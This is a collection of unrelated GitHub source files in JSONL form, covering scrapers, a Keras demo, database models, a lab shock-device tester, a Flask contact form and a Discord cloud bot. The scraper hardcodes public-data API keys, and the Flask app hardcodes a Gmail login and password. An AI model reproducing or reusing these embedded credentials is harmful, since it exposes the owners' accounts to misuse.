{"seq_id":"1060407357","text":"num_capicua = int(input(\"Enter a number: \"))\n\ndef get_lista_numero(numero):\n    lista = []\n    while True:\n        ultimo = numero % 10\n        lista.append(ultimo)\n        numero //= 10\n        if numero == 0:\n            break\n    lista.reverse()\n    return lista\n\nprint(get_lista_numero(num_capicua))\n\ndef get_lista_numero_invertido(numero):\n    num_invertido = []\n    while True:\n        ultimo = numero % 10\n        num_invertido.append(ultimo)\n        numero //= 10\n        if numero == 0:\n            break\n    return num_invertido\n\nprint(get_lista_numero_invertido(num_capicua))\n\ndef capicua(list_1, list_2):\n    long = len(list_1)\n    i = 0\n    while i < long:\n        if list_1[i] != list_2[i]:\n            return False # mismatch: not a palindrome\n        i += 1\n    return True\n\nif capicua(get_lista_numero(num_capicua), get_lista_numero_invertido(num_capicua)):\n    print(\"It is a palindrome\")\nelse:\n    print(\"It is not a palindrome\")\n\n","repo_name":"MenMor/FuncionesEj","sub_path":"capicua_listas.py","file_name":"capicua_listas.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"42662669695","text":"\n\ndef getParking():\n    import requests\n    import json\n\n    url = 'http://openapi.seoul.go.kr:8088/66646952616b696d3333576154424a/json/GetParkInfo/1/900/'\n\n    r = requests.get(url).text\n    list = json.loads(r)\n    total = int(list['GetParkInfo']['list_total_count'])\n    Plist = []\n    for start in range(1, total, 1000):\n        end = start + 1000 - 1\n        if end > total:\n            end = total\n        subUrl = 'http://openapi.seoul.go.kr:8088/66646952616b696d3333576154424a/json/GetParkInfo/' + str(\n            start) + '/' + str(end) + '/'\n\n        data = json.loads(requests.get(subUrl).text)\n        row = data['GetParkInfo']['row']\n\n        for item in row:\n            if 'PARKING_NAME' in item:\n                name = item['PARKING_NAME']\n                addr = item['ADDR']\n                LAT = item['LAT']\n                LNG = item['LNG']\n                Plist.append({'name': name, 'addr': addr, 'LAT': LAT, 'LNG': LNG})\n\n    return Plist\n\n\ndef getPharmacy():\n    from urllib.parse import quote\n    import requests\n    import bs4\n\n    endpoint = 'http://apis.data.go.kr/B552657/ErmctInsttInfoInqireService/getParmacyListInfoInqire?'\n    serviceKey = 
'B78CbLfOD6924JbTWwuUqjtPrOE%2F8gN00tgnG17lUMgvQUx%2BqqdulYUiCVflKIexihA7Q22UlwVwHmPLVAGt5g%3D%3D'\n\n    # names and addresses of pharmacies that are open on Sundays\n\n    Q0 = quote('서울특별시')\n    # Q1 = quote('강남구')\n    # QT = '1'\n    # QN = quote('삼성약국')\n    QRD = 'NAME'\n    pageNo = '1'\n    startPage = '1'\n    numOfRows = '5000'\n    # pageSize = '10'\n\n    paramset = \"serviceKey=\" + serviceKey + \"&Q0=\" + Q0 + \"&QRD=\" + QRD + \"&pageNo=\" + pageNo + \"&startPage=\" + startPage + \"&numOfRows=\" + numOfRows\n\n    url = endpoint + paramset\n    print(url)\n    result = requests.get(url)\n    bs_obj = bs4.BeautifulSoup(result.content, 'html.parser')\n    items = bs_obj.findAll('item')\n\n    listN = []\n\n    for item in items:\n        tagged_item = item.find(\"dutytime6s\")\n        tagged_item2 = item.find(\"dutytime7s\")\n        tagged_item3 = item.find(\"dutytime8s\")\n        if (tagged_item != None and tagged_item2 != None and tagged_item3 != None):\n            name = item.find(\"dutyname\").text\n            addr = item.find(\"dutyaddr\").text\n            lat = item.find('wgs84lat').text\n            lon = item.find('wgs84lon').text\n            # print(name, lat, lon)\n            listN.append({'name': name, 'addr': addr, 'lat': lat, 'lon': lon})\n    return listN\n\n\n\ndef getEos():\n    import requests\n    from bs4 import BeautifulSoup\n    rlist = []\n    url = 'https://bp.eosgo.io/'\n    result = requests.get(url)\n\n    bs_obj = BeautifulSoup(result.content, 'html.parser')\n    itemList = bs_obj.findAll('div', {\"class\": \"lf-item\"})\n\n    # TODO: looping with a for statement works the same way\n    hrefs = [item.find(\"a\")['href'] for item in itemList] # the previous 4 lines reduce to this single line\n\n    for h in hrefs:\n        r = requests.get(h)\n        obj = BeautifulSoup(r.content, 'html.parser')\n        profile_name = obj.find(\"div\", {'class': 'profile-name'})\n        title = profile_name.find(\"h1\").text\n\n        cb = obj.find(\"div\", {\"class\": \"cover-buttons\"})\n        location = cb.find('span', {'class': 'button-label'}).text\n        website = cb.find('a')['href']\n\n        rlist.append({\"title\": title, \"location\": location, \"website\": website})\n    return rlist\n\n\ndef getNowNews():\n    import urllib.request\n    import bs4\n\n    rList = []\n\n    url = 'https://news.naver.com/'\n    html = urllib.request.urlopen(url)\n    obj = bs4.BeautifulSoup(html, \"html.parser\")\n    newsList = obj.findAll(\"div\", {\"class\": \"newsnow_tx_inner\"})\n    for news in newsList:\n        a = news.find(\"a\")\n        url = a[\"href\"]\n        title = news.find('strong').text\n        rList.append({\"title\":title,\"url\":url})\n    return rList\n\n\n\n","repo_name":"kimkm0828/pythonTest","sub_path":"parking/myutil.py","file_name":"myutil.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"73810241444","text":"import tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nimport numpy as np\n\n#1. data [input layer]\nx = np.array([1,2,3])\ny = np.array([1,2,3])\n\n#2. model definition [hidden layer]\nmodel = Sequential()\nmodel.add(Dense(55, input_dim=1)) # 1 node -> 55 nodes\nmodel.add(Dense(77, activation='relu')) # hyperparameter tuning\nmodel.add(Dense(100, activation='sigmoid'))\nmodel.add(Dense(70, activation='linear'))\nmodel.add(Dense(44))\nmodel.add(Dense(1))\n\nmodel.summary() # check the parameter count; because of the bias, each layer has as many parameters as if it had one extra input node\n\n'''\n#3. compile, train\nmodel.compile(loss='mse', optimizer='adam') # mse\nmodel.fit(x, y, epochs=30, batch_size=1)\n\n#4. 
evaluation, prediction [output layer]\nloss = model.evaluate(x, y)\nprint('loss : ', loss)\nresult = model.predict([4])\nprint('predicted value for 4 : ', result)\n\n\nloss : 0.0002002768887905404\npredicted value for 4 : [[3.98252]]\n'''","repo_name":"jangsejong/STUDY","sub_path":"keras/keras21_22_summary/keras21_summary .py","file_name":"keras21_summary .py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"30690703651","text":"# Scrapy settings for wikiscraper project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n#     http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'wikiscraper'\n\nSPIDER_MODULES = ['wikiscraper.spiders']\nNEWSPIDER_MODULE = 'wikiscraper.spiders'\nLOG_LEVEL = 'DEBUG'\n\nITEM_PIPELINES = {\n    'wikiscraper.pipelines.ESPipeline': 100,\n}\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'wikiscraper (+http://www.yourdomain.com)'\n","repo_name":"marcocot/wikiscrapy","sub_path":"wikiscraper/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"28618297967","text":"from database import Base\nfrom sqlalchemy import String,Boolean,Integer,Column, Text, Date, ForeignKey\nfrom sqlalchemy.orm import relationship\n\n\nclass Restaurant(Base):\n    __tablename__ = 'restaurant'\n    id = Column(Integer,primary_key=True, index=True)\n    name = Column(String(255), nullable=False,unique=True)\n    place = Column(Text)\n\n\nclass Menus(Base):\n    __tablename__ = 'menus'\n    id = Column(Integer,primary_key=True, index=True)\n    menu_item = Column(Text)\n    price = Column(Integer)\n    date = Column(Date)\n    resto_id = Column(Integer, ForeignKey(\"restaurant.id\", ondelete=\"CASCADE\"))\n\nclass Users(Base):\n    __tablename__ = 'users'\n    id = Column(Integer,primary_key=True, index=True)\n    name = Column(String(255), nullable=False,unique=True)\n    email = Column(String)\n    password = Column(String)\n    position = Column(String)\n\n    \nclass Voting(Base):\n    __tablename__ = 'vote'\n    id = Column(Integer,primary_key=True, index=True)\n    vote= Column(Boolean)\n    date = Column(Date)\n    menu_id = Column(Integer, ForeignKey(\"menus.id\", ondelete=\"CASCADE\"))\n    user_id = Column(Integer, ForeignKey(\"users.id\", ondelete=\"CASCADE\"))\n    \nclass VotingNew(Base):\n    __tablename__ = 'voting'\n    id = Column(Integer,primary_key=True, index=True)\n    vote= Column(Integer)\n    date = Column(Date)\n    menu_id = Column(Integer, ForeignKey(\"menus.id\", ondelete=\"CASCADE\"))\n    user_id = Column(Integer, ForeignKey(\"users.id\", ondelete=\"CASCADE\"))","repo_name":"lops21/RestaurantChallenge","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"35849157850","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 25 13:27:33 2019\n\n@author: Josh\n\"\"\"\n\nimport sys\nimport time\n\ntry:\n    from itertools import izip\nexcept ImportError:\n    izip=zip\n\ntry:\n    import tkinter as tk\n    from tkinter import messagebox\nexcept ImportError:\n    import Tkinter as tk\n    from Tkinter import messagebox\n    \nfrom shocker import Shocker\n\nclass MainForm(tk.Tk):\n    '''\n    Tkinter root class just used to ask for details at the start\n    '''\n    \n    # range for 
program levels\n lo=71\n hi=104\n # range for dial values\n dlo=0.9\n dhi=4.4\n \n # dial<->program is roughly linear from someone else's tests\n # dials=np.array([0.9,1.1,1.4,1.7,2.1,2.5,2.8,3.3,4.4])\n # levels=np.array([71,72,75,79,80,84,91,96,104])\n \n def __init__(self):\n tk.Tk.__init__(self)\n self.title('Shock Value Tester')\n self.grid()\n self.group = group=tk.LabelFrame(self)\n group.grid(row=9,columnspan=7,sticky='W',padx=5,pady=5,ipadx=5,ipady=5)\n \n label=tk.Label(group,text=\"duration (s)\")\n label.grid(row=0,column=0,sticky='W')\n \n self.db = tk.Entry(group)\n self.db.insert(0,1.0)\n self.db.grid(row=0,column=1,sticky='W')\n \n label=tk.Label(group,text=\"shock level\")\n label.grid(row=1,column=0,sticky='W')\n \n self.sb = tk.Spinbox(group,from_=self.lo,to=self.hi)#,validate='focusout',validatecommand=self._validate)\n self.sb.grid(row=1,column=1,sticky='W')\n \n #spacer\n label=tk.Label(group,text=\"\")\n label.grid(pady=10)\n \n self.zb = tk.Button(group,text=\"ZAP\",command=self.shock)\n self.zb.grid(sticky='E',column=0,pady=0)\n \n self.bind('<Return>',self.shock)\n self.bind('<Escape>',self.close)\n self.protocol('WM_DELETE_WINDOW',self.close)\n \n try:\n shocker = Shocker(192,address=0xD070,mode='in_lab')\n except Exception as e:\n print(e)\n print('not enabling shocker')\n shocker = Shocker(0,0,0)\n self.shocker=shocker\n \n self._shockStop()\n \n def close(self,event=None):\n self.destroy()\n \n def _shockStop(self):\n self.shocker.stop()\n self.configure(background='grey')\n \n def shock(self,event=None):\n try:\n level=int(self.sb.get())\n except ValueError:\n print('invalid level (must be integer)')\n return\n if not self.lo<=level<=self.hi:\n print('invalid range for shock [{},{}]'.format(self.lo,self.hi))\n return\n self.shocker.level=level\n \n try:\n dur=float(self.db.get())\n except ValueError:\n print('invalid duration')\n return\n \n dial = (self.dhi-self.dlo)/(self.hi-self.lo) * (level-self.lo) + self.dlo\n print('shocking level {} for {} s (dial value would be about {:0.3f})'.format(level,dur,dial))\n \n self.configure(background='red')\n self.shocker.start()\n self.after(int(dur*1000), self._shockStop)\n\n\nroot=MainForm()\nroot.mainloop()","repo_name":"navotnaor/navotnaor.github.io","sub_path":"lab_shock_test.py","file_name":"lab_shock_test.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71255042086","text":"from flask import Flask,url_for,render_template,request,redirect\n\nfrom flask_sqlalchemy import SQLAlchemy\n\n#from flask_mail import Mail\n\nimport smtplib\n\napp=Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:@localhost/shop'\ndb=SQLAlchemy(app)\n\n#mail = Mail(app)\n\n'''app.config.update(MAIL_SERVER = 'smtp.gmail.com',\nMAIL_PORT='587',\nMAIL_USE_SSL = True,\nMAIL_USERNAME= 'madanlal885522@gmail.com',\nMAIL_PASSWORD ='hYfkC4NvaG58r8bfPX71')'''\n\ns = smtplib.SMTP('smtp.gmail.com',587)\ns.starttls()\ns.login('madanlal885522@gmail.com','hYfkC4NvaG58r8bfPX71')\n\n\nclass contact(db.Model):\n\n name = db.Column(db.String,nullable=False)\n email = db.Column(db.String,nullable=False)\n time = db.Column(db.Time,nullable=False)\n date = db.Column(db.Date,nullable=False)\n mobile = db.Column(db.Integer,nullable=False)\n messege = db.Column(db.String,nullable=False)\n serial_no = db.Column(db.Integer, primary_key=True)\n\n\n@app.route('/',methods=['GET','POST'])\ndef index():\n if (request.method == 'POST'):\n 
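        # pull the submitted contact-form fields out of the POST body\n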
name=request.form.get('name')\n        email=request.form.get('email')\n        date = request.form.get('date')\n        time=request.form.get('time')\n        mobile=request.form.get('mobile')\n        messege=request.form.get('messege')\n\n        entry = contact(name=name,email=email,date=date,time=time,mobile=mobile,messege=messege)\n        db.session.add(entry)\n        db.session.commit()\n\n\n        s.sendmail(email,'madanlal885522@gmail.com','new msg from '+name+'\\nemail: '+email+'\\nmobile: '+mobile+'\\nmessege: '+messege+'\\ndate :'+date+'\\ntime :'+time)\n\n        return redirect('/')\n\n\n    return render_template(\"index.html\")\n\n\napp.run(debug=True)","repo_name":"madannikalje/flask_projects","sub_path":"project1/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"23427711625","text":"\"\"\"\nDiscord command definition for /{DISCORD_GROUP_PCI} instance\n\"\"\"\nimport json\n\nimport discord\n\nfrom discord.commands import option\nfrom discord.ext import commands\nfrom loguru import logger\nfrom tabulate import tabulate\n\nfrom variables import (\n    DISCORD_GROUP_PCI,\n    ROLE_TECH_RO,\n    ROLE_TECH_RW,\n)\n\nfrom ._autocomplete import (\n    get_instance_list,\n    get_project_list,\n    get_sshkey_list,\n)\nfrom ._views import InstanceCreationView\n\ndef instance(group_pci, ovh_client, my_nic):\n    \"\"\"\n    Discord command definition for /{DISCORD_GROUP_PCI} instance\n    \"\"\"\n    @group_pci.command(\n        description='Commands related to Project Instances',\n        default_permission=False,\n        name='instance',\n    )\n    @commands.has_any_role(ROLE_TECH_RO)\n    @option(\n        \"action\",\n        description=\"Instances action\",\n        autocomplete=discord.utils.basic_autocomplete(\n            [\n                discord.OptionChoice(\"delete\", value=\"delete\"),\n                discord.OptionChoice(\"list\", value=\"list\"),\n                discord.OptionChoice(\"show\", value=\"show\"),\n                discord.OptionChoice(\"create\", value=\"create\"),\n            ]\n        )\n    )\n    @option(\n        \"projectid\",\n        description=\"Project ID\",\n        autocomplete=get_project_list,\n        required=True,\n    )\n    @option(\n        \"instanceid\",\n        description=\"Instance ID\",\n        autocomplete=get_instance_list,\n        required=False,\n    )\n    @option(\n        \"sshkeyid\",\n        description=\"SSH Key ID\",\n        autocomplete=get_sshkey_list,\n        required=False,\n    )\n    async def instance(\n        ctx,\n        action: str,\n        projectid: str,\n        instanceid: str,\n        sshkeyid: str,\n    ):\n        \"\"\"\n        This part performs actions on Public Cloud Instances\n        So far:\n        - list: Displays the list of ALL Instances\n        - show: Displays the details of a specific Instance\n        - delete: Deletes a specific Instance\n        - create: Creates a new Instance\n        \"\"\"\n        # As we rely on potentially a lot of API calls, we need time to answer\n        await ctx.defer()\n        # Pre-flight checks\n        if ctx.channel.type is discord.ChannelType.private:\n            channel = ctx.channel.type\n        else:\n            channel = ctx.channel.name\n        name = ctx.author.name\n        logger.info(\n            f'[#{channel}][{name}] /{DISCORD_GROUP_PCI} instance '\n            f'{action} {projectid} {instanceid}'\n        )\n\n        if action == 'list':\n            # This command will require basic TECH_RO role, checked before\n            try:\n                embed = discord.Embed(\n                    title=f'**{my_nic}**',\n                    colour=discord.Colour.green()\n                )\n                # We start with the headers\n                embed_field_value_table = {\n                    'Instance Name': [],\n                    'Region': [],\n                    'Flavor': [],\n                }\n\n                project = ovh_client.get(f'/cloud/project/{projectid}')\n                if project['status'] == 'suspended':\n                    # Suspended Projects cannot be queried later\n                    embed.add_field(\n                        name=f'Project ID: **{projectid}**',\n                        
value='(Suspended)',\n inline=False,\n )\n\n instances = ovh_client.get(\n f'/cloud/project/{projectid}/instance'\n )\n if len(instances) == 0:\n # There is no Instances in the Project\n embed.add_field(\n name=f'Project ID: **{projectid}**',\n value='No Instances',\n inline=False,\n )\n await ctx.interaction.edit_original_response(\n embed=embed\n )\n return\n\n # We loop over the instances to grab their names\n for instance in instances:\n if 'nodepool' in instance['name']:\n # We want to exclude K8s nodepool nodes\n # Too much trouble if someone mistakenly kills one\n continue\n\n embed_field_value_table['Instance Name'].append(instance['name'])\n embed_field_value_table['Region'].append(instance['region'])\n embed_field_value_table['Flavor'].append(instance['planCode'].split('.')[0])\n\n embed.add_field(\n name=f'Project ID: **{projectid}**',\n value=(\n '```' +\n tabulate(\n embed_field_value_table,\n headers='keys',\n tablefmt='pretty',\n stralign='right',\n ) +\n '```'\n ),\n inline=False,\n )\n\n await ctx.interaction.edit_original_response(\n embed=embed\n )\n\n except Exception as e:\n msg = f'API calls KO [{e}]'\n logger.error(msg)\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n else:\n logger.debug(f'[#{channel}][{name}] └──> Queries OK')\n return\n elif action == 'show':\n # This command will require basic TECH_RO role, checked before\n if projectid is None or instanceid is None:\n logger.error('Missing mandatory option(s)')\n msg = (\n 'Check that you provided all variables: \\n'\n ' - `projectid` \\n'\n ' - `instanceid` \\n'\n )\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n\n try:\n instance = ovh_client.get(\n f'/cloud/project/{projectid}/instance/{instanceid}'\n )\n except Exception as e:\n msg = f'API calls KO [{e}]'\n logger.error(msg)\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n else:\n embed = discord.Embed(\n description=(\n f'```json\\n'\n f'{json.dumps(instance, indent=4)}'\n f'\\n```'\n ),\n colour=discord.Colour.green()\n )\n await ctx.respond(embed=embed)\n\n logger.debug(f'[#{channel}][{name}] └──> Queries OK')\n return\n elif action == 'delete':\n # Here for this one, we need more elevated role - TECH_RW\n # Pre-flight checks : Roles\n role_rw = discord.utils.get(ctx.author.guild.roles, name=ROLE_TECH_RW)\n if role_rw not in ctx.author.roles:\n msg = (\n f'[#{channel}][{name}] └──> Missing required role (@{ROLE_TECH_RW})'\n )\n logger.warning(msg)\n embed = discord.Embed(\n description=(\n f\"You don't have the role requested for this operation (@{ROLE_TECH_RW})\"\n ),\n colour=discord.Colour.orange()\n )\n await ctx.respond(embed=embed)\n return\n\n if projectid is None or instanceid is None:\n logger.error('Missing mandatory option(s)')\n msg = (\n 'Check that you provided all variables: \\n'\n ' - `projectid` \\n'\n ' - `instanceid` \\n'\n )\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n\n try:\n instance = ovh_client.get(\n f'/cloud/project/{projectid}/instance/{instanceid}'\n )\n ovh_client.delete(\n f'/cloud/project/{projectid}/instance/{instanceid}'\n )\n except Exception as e:\n msg = f'API calls KO [{e}]'\n logger.error(msg)\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n else:\n 
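                # deletion succeeded; confirm to the user with a green embed\n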
embed = discord.Embed(\n title=f'**{my_nic}**',\n description=(\n f\"The Public Cloud Instance \"\n f\"`{instance['name']}` in {instance['region']} \"\n f\"was deleted\"\n ),\n colour=discord.Colour.green()\n )\n embed.set_footer(text=f\"Project ID: {projectid}\")\n\n await ctx.respond(embed=embed)\n\n logger.debug(f'[#{channel}][{name}] └──> Queries OK')\n return\n elif action == 'create':\n # Here for this one, we need more elevated role - TECH_RW\n # Pre-flight checks : Roles\n role_rw = discord.utils.get(ctx.author.guild.roles, name=ROLE_TECH_RW)\n if role_rw not in ctx.author.roles:\n msg = (\n f'[#{channel}][{name}] └──> Missing required role (@{ROLE_TECH_RW})'\n )\n logger.warning(msg)\n embed = discord.Embed(\n description=(\n f\"You don't have the role requested for this operation (@{ROLE_TECH_RW})\"\n ),\n colour=discord.Colour.orange()\n )\n await ctx.respond(embed=embed)\n return\n\n if projectid is None or sshkeyid is None:\n logger.error('Missing mandatory option(s)')\n msg = (\n 'Check that you provided all variables: \\n'\n ' - `projectid` \\n'\n ' - `sshkeyid` \\n'\n )\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n\n try:\n await ctx.respond(\n \"Give me some parameters to fullfill this action:\",\n view=InstanceCreationView(ctx, ovh_client, projectid, sshkeyid),\n ephemeral=True,\n )\n except Exception as e:\n msg = f'Command aborted: Instance creation KO [{e}]'\n logger.error(msg)\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n else:\n logger.info('Command successfull: Instance creation OK')\n return\n","repo_name":"RemyAtOVH/imabot","sub_path":"code/subcommands/public_cloud/instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":11792,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"23632339840","text":"import string\nimport copy\nimport math\n\nclass AdvNumber:\n def add_to_fraction(self, val, num_or_dom):\n num_or_dom[0] *= val\n\n def __init__(self, val1, val2=1, op=\"uxux\"):\n self.num_numerator = [1]\n self.num_denominator = [1]\n self.var_numerator = []\n self.var_denominator = []\n \n if op == \"uxux\":\n self.num_numerator = [val1]\n self.num_denominator = [val2]\n else:\n if type(val1) == int:\n val1 = AdvNumber(val1)\n if type(val2) == int:\n val2 = AdvNumber(val2)\n self.combine(val1, val2, op)\n\n def get_reciprocal(self, val):\n temp = [copy.copy(val.num_numerator) , copy.copy(val.var_numerator)]\n val.num_numerator = val.num_denominator\n val.var_numerator = val.var_denominator\n val.num_denominator = temp[0]\n val.var_denominator = temp[1]\n return val\n # def __init__(self, num, variable_arr, op_for_each):\n # self.val = str(num) + [i for i in variable_arr]\n\n # def __init__(self, exp1 : AdvNumber, exp2 : AdvNumber, op):\n # self.val = str(exp1) + op + str(exp2)\n\n def combine(self, val1 , val2 , op : string):\n if val1.var_numerator == [] and val1.var_denominator == [] and val2.var_denominator == [] and val2.var_numerator == []:\n if op == \"*\":\n self.add_to_fraction(val1.num_numerator[0] , self.num_numerator)\n self.add_to_fraction(val2.num_numerator[0] , self.num_numerator)\n self.add_to_fraction(val1.num_denominator[0] , self.num_denominator)\n self.add_to_fraction(val2.num_denominator[0] , self.num_denominator) \n elif op == \"/\":\n var2_inverse = self.get_reciprocal(val2)\n self.combine(val1, var2_inverse, \"*\")\n 
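            # a/b + c/d: scale both numerators onto lcm(b, d), then add them\n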
elif op == \"+\":\n                lcm = math.lcm(val1.num_denominator[0], val2.num_denominator[0])\n                self.add_to_fraction(lcm, self.num_denominator)\n                val1_factor = lcm//val1.num_denominator[0]\n                val2_factor = lcm//val2.num_denominator[0]\n                val1.num_numerator[0] *= val1_factor\n                val2.num_numerator[0] *= val2_factor\n                self.add_to_fraction(val1.num_numerator[0] + val2.num_numerator[0], self.num_numerator)\n            elif op == \"-\":\n                val2.num_numerator[0] *= -1\n                self.combine(val1, val2, '+')\n\n        #\n        # if type(val1) is int and type(val2) is int:\n        #     if op == \"/\":\n        #         self.add_to_fraction(val1, self.num_numerator)\n        #         self.add_to_fraction(val2, self.num_denominator)\n        #     else:\n        #         result = basicArithmetic(val1, val2, op)\n        #         self.add_to_fraction(result, self.num_numerator)\n        # elif (type(val1) is str and type(val2) is int) or (type(val1) is int and type(val2) is str) :\n        #     pass\n        # elif type(val1) is str and type(val2) is str:\n        #     pass\n\n\n    def __str__(self):\n        return(str(self.num_numerator) + \" / \" + str(self.num_denominator))","repo_name":"meherGill/expression-simplifier","sub_path":"AdvNumber.py","file_name":"AdvNumber.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"37592358548","text":"from src.objeto import Objeto, Tipo\nfrom src.Vertice import Vertice\nfrom src.constants import BORDER_SIZE\n\nfrom PyQt6 import QtGui\n\n\nclass Ponto(Objeto):\n    def __init__(self, nome: str, coordenadas: Vertice) -> None:\n        if len(coordenadas.world_coordinates) != 2:\n            raise Exception('Creating a point requires two, and only two, coordinates.')\n        super().__init__(nome, Tipo.PONTO)\n        self.coordenadas = coordenadas\n\n    def copy_world_to_cpp_coordinates(self):\n        self.coordenadas.cpp_coordinates = self.coordenadas.world_coordinates\n\n    def translate(self, dx: int, dy: int) -> tuple[int, int]:\n        self.coordenadas.world_coordinates = super().translate(self.coordenadas.world_coordinates, dx, dy)\n        self.copy_world_to_cpp_coordinates()\n    \n    def rotate(self, angle, center) -> tuple[int, int]:\n        cx, cy = center\n        self.translate(-cx, -cy)\n        self.coordenadas.world_coordinates = super().rotate(self.coordenadas.world_coordinates, angle)\n        self.copy_world_to_cpp_coordinates()\n        self.translate(cx, cy)\n    \n    def should_draw(self, xmin, xmax, ymin, ymax, xw, yw):\n        return ((xw > xmin) and (xw < xmax)) and ((yw > ymin) and (yw < ymax))\n\n    def draw(self, canvas, container, world_coords, coords):\n        bd = BORDER_SIZE\n        x, y = coords\n        minXvp, maxXvp, minYvp, maxYvp = world_coords\n        \n        if not self.should_draw(minXvp + bd, maxXvp - bd, minYvp + bd, maxYvp - bd, x, y):\n            return\n\n        pen = QtGui.QPen(QtGui.QColor(self.cor))\n        pen.setWidth(2)\n\n        painter = QtGui.QPainter(canvas)\n        painter.setPen(pen)\n\n        painter.drawPoint(x, y)\n        painter.end()\n        container.setPixmap(canvas)\n","repo_name":"ricardofachini/trabalho1-transformada-viewport","sub_path":"src/Ponto.py","file_name":"Ponto.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"27399703673","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\"\"\"\nmodule: lib\n\"\"\"\nimport sys, os\nimport time, logging, json, random, uuid, datetime\nfrom datetime import date\n\nlogging.basicConfig(level=logging.DEBUG,\n                format=\"%(asctime)s - %(levelname)s - %(message)s\")\n\n\nclass Clock():\n    \"\"\"A frame clock that caps the refresh rate\n    >>> c = Clock(20) # fps\n    >>> c.tick(block=False)\n    \"\"\"\n    def 
__init__(self, fps):\n        self.set_fps(fps)\n\n    def set_fps(self, fps):\n        self.fps = fps\n        self.interval = 1.0/float(fps)\n        self.pre = time.time()\n\n    def tick(self, block=True):\n        \"\"\"\n        Check whether the tick interval has elapsed\n        \"\"\"\n        mid = time.time() - self.pre\n        if mid < self.interval:\n            if block:\n                time.sleep(self.interval - mid)\n            else:\n                return\n        self.pre = time.time()\n        return True\n","repo_name":"halida/snake-challenge","sub_path":"srcs/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"52"}
{"seq_id":"24089758201","text":"from django_filters import rest_framework as df\n\nfrom .widgets import ModelFieldSelect2MultiWidget, ModelFieldSelect2Widget\n\n\nclass Select2ChoiceFilterBase:\n    def __init__(self, model, field, *args, **kwargs):\n        kwargs.update(\n            queryset=model.objects.filter(**{f\"{field}__isnull\": False}),\n            to_field_name=field,\n            widget=self.widget(\n                search_fields=[\n                    f\"{field}__{kwargs.pop('select2_lookup_expr','icontains')}\",\n                ]\n            ),\n        )\n        super().__init__(*args, **kwargs)\n\n\nclass Select2ChoiceFilter(Select2ChoiceFilterBase, df.ModelChoiceFilter):\n    \"\"\"A subclass of `django_filters.ModelChoiceFilter` that supports\n    Select2 querying of possible values.\"\"\"\n\n    widget = ModelFieldSelect2Widget\n\n\nclass Select2MultipleChoiceFilter(Select2ChoiceFilterBase, df.ModelMultipleChoiceFilter):\n    \"\"\"Same as `Select2ChoiceFilter` but allows selection of multiple values\"\"\"\n\n    widget = ModelFieldSelect2MultiWidget\n","repo_name":"Geoluminate/geoluminate","sub_path":"geoluminate/utils/select2/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
